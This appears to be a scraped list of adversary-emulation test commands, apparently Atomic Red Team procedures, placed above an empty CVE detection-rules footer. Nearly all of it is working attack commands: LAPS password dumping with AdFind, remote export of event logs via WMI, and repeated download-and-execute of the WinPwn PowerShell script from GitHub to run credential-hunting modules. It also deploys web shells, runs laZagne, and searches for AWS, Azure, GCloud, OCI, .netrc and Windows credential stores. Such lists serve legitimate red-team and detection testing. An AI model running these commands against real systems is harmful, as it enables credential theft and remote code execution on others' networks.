& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.